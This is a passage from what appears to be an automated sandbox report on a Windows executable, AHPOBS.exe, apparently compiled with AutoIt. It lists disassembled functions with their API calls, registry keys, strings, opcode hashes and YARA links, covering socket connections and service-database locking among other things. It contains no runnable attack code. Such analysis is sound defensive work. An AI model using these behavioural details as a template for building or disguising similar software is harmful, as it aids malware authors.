                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                      • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                      Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                      • _wcslen.LIBCMT ref: 004335F2
                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                      • GetLastError.KERNEL32 ref: 0043362B
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                      • _wcsrchr.LIBCMT ref: 00433666
                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                      • String ID: \
                                      • API String ID: 321622961-2967466578
                                      • Opcode ID: ca3ca64df16dd99c9d1ec9e68faae20544b3f7039bee5a33b03b189014f46b41
                                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                      • Opcode Fuzzy Hash: ca3ca64df16dd99c9d1ec9e68faae20544b3f7039bee5a33b03b189014f46b41
                                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                      Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • std::exception::exception.LIBCMT ref: 00411626
                                      • std::exception::exception.LIBCMT ref: 00411640
                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID: ,*H$4*H$@fI
                                      • API String ID: 615853336-1459471987
                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                      Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorInitLast
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 3207048006-625585964
                                      • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                      • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                      • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                      • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                      Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                      Download Yara Rule
                                      APIs
                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                      • _wcsncpy.LIBCMT ref: 004102ED
                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                      • _wcsncpy.LIBCMT ref: 00410340
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                      • String ID: C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 3170942423-1987918518
                                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                      Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                        • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                        • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                      • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                      • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 3300667738-0
                                      • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                      • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                      • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                      • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                      Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                      • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                      Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                      Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorLast
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 2487901850-572801152
                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                      • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                      • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                      Function 00432FEE Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.SECHOST(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                      • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                      • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                      • GetLastError.KERNEL32 ref: 00433024
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                      • String ID:
                                      • API String ID: 1690418490-0
                                      • Opcode ID: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                      • Instruction ID: 735ec6acd85acabf56193826cd071f2489ef818a13be6dc6b3d06c037ab4ab6a
                                      • Opcode Fuzzy Hash: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                      • Instruction Fuzzy Hash: D5E065315822216BD6261B346E4DBCF37A8EB2F752F141827F701D6250CB998445D7A8
                                      Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNEL32(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                      • RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                      • RegCloseKey.KERNEL32(?), ref: 0040F2B5
                                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Close$OpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 1607946009-824357125
                                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                      Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WS2_32(00000002,00000001,00000006,00000000), ref: 004653FE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                      • connect.WS2_32(00000000,?,00000010), ref: 00465446
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 245547762-0
                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                      Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: IsThemeActive$uxtheme.dll
                                      • API String ID: 2574300362-3542929980
                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                      Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                      Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • gethostbyname.WS2_32(?,00000000,?,?), ref: 0046D42D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                      • _memmove.LIBCMT ref: 0046D475
                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                      Memory Dump Source
